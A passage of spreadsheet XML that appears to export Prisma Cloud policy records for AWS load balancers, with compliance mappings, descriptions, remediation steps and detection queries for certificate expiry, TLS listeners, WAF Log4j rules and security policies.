2022.2.1, ISO/IEC 27002:2013, MLPS 2.0, CHC HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST SP 800-171 Revision 3, ITSG-33, GDPR, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, CSA CCM v.4.0.6, ITSG-33, NIST 800-53 Rev 5, MAS TRM 2021, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, ISO/IEC 27002:2013, DORA, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ITSG-33, TX-RAMP Level 2, Sarbanes Oxley Act (SOX), HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, ISO 27002:2022, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, NIST 800-53 Rev 5, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1902" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1902" s="2" t="inlineStr"/>
      <c r="D1902" t="inlineStr"/>
      <c r="E1902" t="inlineStr"/>
      <c r="F1902" t="inlineStr"/>
      <c r="G1902" t="b">
        <v>0</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1902" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1902" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (ELB) with IAM certificate expiring in 90 days</t>
        </is>
      </c>
      <c r="L1902" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1902" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1902" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1902" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1902" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1902" t="inlineStr">
        <is>
          <t>SC-1</t>
        </is>
      </c>
      <c r="R1902" t="inlineStr">
        <is>
          <t>SC-12</t>
        </is>
      </c>
      <c r="S1902" t="inlineStr"/>
      <c r="T1902" t="b">
        <v>0</v>
      </c>
      <c r="U1902" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1902" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1902" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers (ELB) which are using IAM certificates expiring in 90 days or using expired certificates. Removing expired IAM certificates eliminates the risk and prevents the damage of credibility of the application/website behind the ELB. As a best practice, it is recommended to reimport expiring certificates while preserving the ELB associations of the original certificate.</t>
        </is>
      </c>
      <c r="X1902" t="inlineStr">
        <is>
          <t>Removing invalid certificates via AWS Management Console is not currently supported. To delete/upload SSL/TLS certificates stored in IAM via the AWS API use the Command Line Interface (CLI).
Remediation CLI:
1. Run describe-load-balancers command to make sure that the expiring server certificate is not currently used by any active load balancer.
aws elb describe-load-balancers --region &lt;COMPUTE_REGION&gt; --load-balancer-names &lt;ELB_NAME&gt; --query 'LoadBalancerDescriptions[*].ListenerDescriptions[*].Listener.SSLCertificateId'
This command output will return the Amazon Resource Name (ARN) for the SSL certificate currently used by the selected ELB:
[
 [
  \"arn:aws:iam::1234567890:server-certificate/MyCertificate\"
 ]
]
2. Create new AWS IAM certificate with your desired parameters value
3. To upload new IAM Certificate:
aws iam upload-server-certificate --server-certificate-name &lt;NEW_CERTIFICATE_NAME&gt; --certificate-body file://Certificate.pem --certificate-chain file://CertificateChain.pem --private-key file://PrivateKey.pem
4. To replaces the existing SSL certificate for the specified HTTPS load balancer:
aws elb set-load-balancer-listener-ssl-certificate --load-balancer-name &lt;ELB_NAME&gt; --load-balancer-port 443 --ssl-certificate-id arn:aws:iam::1234567890:server-certificate/&lt;NEW_CERTIFICATE_NAME&gt;
5. Now that is safe to remove the expiring SSL/TLS certificate from AWS IAM, To delete it run:
aws iam delete-server-certificate --server-certificate-name &lt;CERTIFICATE_NAME&gt;</t>
        </is>
      </c>
      <c r="Y1902" t="inlineStr"/>
      <c r="Z1902" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elb-describe-load-balancers' as X; config from cloud.resource where api.name = 'aws-iam-list-server-certificates' as Y; filter '($.X.description.listenerDescriptions[*].listener.sslcertificateId equals $.Y.arn and ((_DateTime.ageInDays($.Y.expiration) &gt; -90 and (_DateTime.ageInDays($.Y.expiration) &lt; 0 or _DateTime.ageInDays($.Y.expiration) == 0)) or (_DateTime.ageInDays($.Y.expiration) &gt; 0)))'; show X;</t>
        </is>
      </c>
      <c r="AA1902" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1902" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1902" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-317</t>
        </is>
      </c>
      <c r="AD1902" t="b">
        <v>1</v>
      </c>
      <c r="AE1902" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1902" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>2066c4ed-70ad-420e-acd6-a7d6df0797eb</t>
        </is>
      </c>
      <c r="AI1902" t="inlineStr">
        <is>
          <t>2b143680-1406-4c53-a8d4-fdb3221ef275</t>
        </is>
      </c>
      <c r="AJ1902" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1902" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1903">
      <c r="A1903" t="inlineStr"/>
      <c r="B1903" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1903" s="2" t="inlineStr"/>
      <c r="D1903" t="inlineStr"/>
      <c r="E1903" t="inlineStr"/>
      <c r="F1903" t="inlineStr"/>
      <c r="G1903" t="b">
        <v>1</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1903" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1903" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) with cross-zone load balancing disabled</t>
        </is>
      </c>
      <c r="L1903" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1903" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1903" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1903" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1903" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1903" t="inlineStr"/>
      <c r="R1903" t="inlineStr"/>
      <c r="S1903" t="inlineStr"/>
      <c r="T1903" t="b">
        <v>0</v>
      </c>
      <c r="U1903" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1903" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1903" t="inlineStr">
        <is>
          <t>This policy identifies load balancers that do not have cross-zone load balancing enabled.
Cross-zone load balancing evenly distributes incoming traffic across healthy targets in all availability zones. This can help to ensure your application can manage additional traffic and limit the risk of any single availability zone getting overwhelmed and perhaps affecting load balancer performance.
It is recommended to enable cross-zone load balancing.</t>
        </is>
      </c>
      <c r="X1903" t="inlineStr">
        <is>
          <t>To enable cross-zone load balancing, please follow the below steps:
1. Log in to the AWS console.
2. Go to the EC2 Dashboard and select 'Load Balancers'
3. Click on the reported load balancer. Under the 'Actions' dropdown, select 'Edit load balancer attributes'.
4. For Gateway load balancers, under 'Availability Zone routing Configuration', enable 'Cross-zone load balancing'.
5. For Network load balancers, under 'Availability Zone routing Configuration', select the 'Enable cross-zone load balancing' option.
6. Click on 'Save changes'. 
Build Recommendation: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled
IaC: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled</t>
        </is>
      </c>
      <c r="Y1903" t="inlineStr"/>
      <c r="Z1903" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = ['attributes'].['load_balancing.cross_zone.enabled'] is false
{"category":"Networking","resourceTypes":["aws_elb"]}</t>
        </is>
      </c>
      <c r="AA1903" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1903" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1903" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-1125-CKV_AWS_152</t>
        </is>
      </c>
      <c r="AD1903" t="b">
        <v>1</v>
      </c>
      <c r="AE1903" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1903" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>33a49bf7-61f7-40c5-b604-ecd46dfb4094</t>
        </is>
      </c>
      <c r="AI1903" t="inlineStr">
        <is>
          <t>451f1e52-5b46-4ef7-8341-6055e3066398</t>
        </is>
      </c>
      <c r="AJ1903" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1903" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1904">
      <c r="A1904" t="inlineStr">
        <is>
          <t>HIPAA, MAS TRM 2021, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, ISO 27002:2022, CHC HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.6, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, ACSC Information Security Manual (ISM), DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, FFIEC, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, Copy of CIS Controls v8, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, DORA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), GDPR, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CSA CCM v.4.0.6, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v4.0.12, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, MAS TRM 2021, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.1, Korea – Information Security Management System (ISMS), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1904" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1904" s="2" t="inlineStr"/>
      <c r="D1904" t="inlineStr"/>
      <c r="E1904" t="inlineStr"/>
      <c r="F1904" t="inlineStr"/>
      <c r="G1904" t="b">
        <v>1</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1904" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1904" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer v2 (ELBv2) with listener TLS/SSL is not configured</t>
        </is>
      </c>
      <c r="L1904" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1904" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1904" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1904" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1904" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1904" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R1904" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S1904" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1904" t="b">
        <v>0</v>
      </c>
      <c r="U1904" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1904" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1904" t="inlineStr">
        <is>
          <t>This policy identifies AWS Elastic Load Balancers v2 (ELBv2) which have non-secure listeners. As Load Balancers will be handling all incoming requests and routing the traffic accordingly. The listeners on the load balancers should always receive traffic over secure channel with a valid SSL certificate configured.</t>
        </is>
      </c>
      <c r="X1904" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 dashboard
4. Click on 'Load Balancers' (Left Panel)
5. Select the reported ELB
6. On the Listeners tab, Click the 'Edit' button under the available listeners
7. In the Load Balancer Protocol type is application select the listener protocol as 'HTTPS (Secure HTTP)' or If the load balancer type is network, select the listener protocol as TLS
8. Select appropriate 'Security policy' 
9. In the SSL Certificate column, click 'Change'
10. On 'Select Certificate' popup dialog, Choose a certificate from ACM or IAM or upload a new certificate based on requirement and Click on 'Save'
11. Back to the 'Edit listeners' dialog box, review the secure listeners configuration, then click on 'Save'</t>
        </is>
      </c>
      <c r="Y1904" t="inlineStr"/>
      <c r="Z1904" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = state.code contains active and listeners[?any( protocol is member of (HTTP,TCP,UDP,TCP_UDP) and defaultActions[?any( redirectConfig.protocol contains HTTPS)] does not exist )] exists as X; config from cloud.resource where api.name = 'aws-elbv2-target-group' AND json.rule = targetType does not equal alb and protocol exists and protocol is not member of ('TLS', 'HTTPS') as Y; filter '$.X.listeners[?any( protocol equals HTTP or protocol equals UDP or protocol equals TCP_UDP )] exists or ( $.X.listeners[*].protocol equals TCP and $.X.listeners[*].defaultActions[*].targetGroupArn contains $.Y.targetGroupArn)'; show X;</t>
        </is>
      </c>
      <c r="AA1904" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1904" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1904" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-527</t>
        </is>
      </c>
      <c r="AD1904" t="b">
        <v>1</v>
      </c>
      <c r="AE1904" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1904" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>dd7588a1-79f0-4b2b-8139-891eb50f570e</t>
        </is>
      </c>
      <c r="AI1904" t="inlineStr">
        <is>
          <t>5ca12730-cccc-4f90-aa6c-04ea81644cae</t>
        </is>
      </c>
      <c r="AJ1904" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1904" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1905">
      <c r="A1905" t="inlineStr">
        <is>
          <t>CIS Controls v8, CIS Controls v8.1, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, FFIEC, PCI DSS v4.0, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, NYDFS 23 CRR-NY 500.0, CIS Controls v7.1, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, kfirdaus AWS Account-CS, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, PCI DSS v4.0, ISO/IEC 27001:2022, NIST CSF v2.0, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), DORA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1905" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1905" s="2" t="inlineStr"/>
      <c r="D1905" t="inlineStr"/>
      <c r="E1905" t="inlineStr"/>
      <c r="F1905" t="inlineStr"/>
      <c r="G1905" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1905" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1905" t="inlineStr">
        <is>
          <t>AWS ALB attached WAFv2 WebACL is not configured with AMR for Log4j Vulnerability</t>
        </is>
      </c>
      <c r="L1905" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1905" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1905" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1905" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1905" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1905" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1905" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S1905" t="inlineStr"/>
      <c r="T1905" t="b">
        <v>0</v>
      </c>
      <c r="U1905" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1905" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1905" t="inlineStr">
        <is>
          <t>This policy identifies AWS Application Load Balancer (ALB) attached with WAFv2 WebACL which is not configured with AWS Managed Rules (AMR) for Log4j Vulnerability. As per the guidelines given by AWS, Application Load Balancer (ALB) attached with WAFv2 WebACL should be configured with AWS Managed Rules (AMR) AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList to protect from Log4j Vulnerability (CVE-2021-44228).
For more information please refer below URL,
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/</t>
        </is>
      </c>
      <c r="X1905" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Navigate to EC2 Dashboard, and select 'Load Balancers'
3. Make sure your reported Application Load Balancer requires WAF based on your requirement and Note down the load balancer name
4. Navigate to WAF &amp; Shield Service
5. Go to the Web ACL associated to the reported Application Load Balancer
6. Under 'Rules' tab click on 'Add rules' and select 'Add managed rule groups'
7. Under 'AWS managed rule groups' enable 'Anonymous IP list' and 'Known bad inputs'
8. Click on 'Add rules'</t>
        </is>
      </c>
      <c r="Y1905" t="inlineStr"/>
      <c r="Z1905" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = scheme equals internet-facing and type equals application as X; config from cloud.resource where api.name = 'aws-waf-v2-web-acl-resource' AND json.rule = (webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesAnonymousIpList or webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesKnownBadInputsRuleSet) and NOT ( webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesAnonymousIpList and webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesKnownBadInputsRuleSet ) as Y; filter '$.Y.resources.applicationLoadBalancer[*] contains $.X.loadBalancerArn'; show X;</t>
        </is>
      </c>
      <c r="AA1905" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1905" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1905" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-834</t>
        </is>
      </c>
      <c r="AD1905" t="b">
        <v>1</v>
      </c>
      <c r="AE1905" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1905" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>974cbc1a-d26b-4465-bbdc-991edf2a334b</t>
        </is>
      </c>
      <c r="AI1905" t="inlineStr">
        <is>
          <t>77b5adbd-98da-47f2-893b-f33f8be33525</t>
        </is>
      </c>
      <c r="AJ1905" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1905" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1906">
      <c r="A1906" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0, CIS Controls v8.1, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, SOC 2, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), TX-RAMP Level 1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, DORA, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ITSG-33, SOC 2, HITRUST v.9.4.2 [Deprecated], GDPR, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, TX-RAMP Level 2, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, kashan ACSC Information Security Manual (ISM), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1906" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1906" s="2" t="inlineStr"/>
      <c r="D1906" t="inlineStr"/>
      <c r="E1906" t="inlineStr"/>
      <c r="F1906" t="inlineStr"/>
      <c r="G1906" t="b">
        <v>1</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1906" t="inlineStr">
        <is>
          <t>aws-elbv2</t>
        </is>
      </c>
      <c r="K1906" t="inlineStr">
        <is>
          <t>AWS Application Load Balancer (ALB) is not using the latest predefined security policy</t>
        </is>
      </c>
      <c r="L1906" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1906" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1906" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1906" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1906" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1906" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1906" t="inlineStr">
        <is>
          <t>ISM-1438</t>
        </is>
      </c>
      <c r="S1906" t="inlineStr"/>
      <c r="T1906" t="b">
        <v>0</v>
      </c>
      <c r="U1906" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1906" t="inlineStr">
        <is>
          <t>aws-elbv2-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1906" t="inlineStr">
        <is>
          <t>This policy identifies Application Load Balancers (ALBs) are not using the latest predefined security policy. A security policy is a combination of protocols and ciphers. The protocol establishes a secure connection between a client and a server and ensures that all data passed between the client and your load balancer is private. A cipher is an encryption algorithm that uses encryption keys to create a coded message. So it is recommended to use the latest predefined security policy which uses only secured protocol and ciphers.
We recommend using either non-FIPS security policy ELBSecurityPolicy-TLS13-1-2-2021-06 or FIPS security policy ELBSecurityPolicy-TLS13-1-2-FIPS-2023-04 to meet compliance and security standards that require disabling certain TLS protocol versions or to support legacy clients that require deprecated ciphers.
For more details:
https://docs.aws.amazon.com/elasticloadbalancing/latest/application/create-https-listener.html#describe-ssl-policies</t>
        </is>
      </c>
      <c r="X1906" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to the EC2 Dashboard, and select 'Load Balancers'
4. Click on the reported Load Balancer
5. On the 'Listeners' tab, Choose the 'HTTPS' or 'SSL' rule
6. Click on 'Edit Listener' in the 'Manage listener' dropdown, Change 'Security policy' to 'ELBSecurityPolicy-TLS13-1-2-2021-06' (non-FIPS) or 'ELBSecurityPolicy-TLS13-1-2-FIPS-2023-04' (FIPS) to meet compliance and security standards that require disabling certain TLS protocol versions or to support legacy clients that require deprecated ciphers.
7. Click on 'Update' to save your changes</t>
        </is>
      </c>
      <c r="Y1906" t="inlineStr"/>
      <c r="Z1906" t="inlineStr">
        <is>
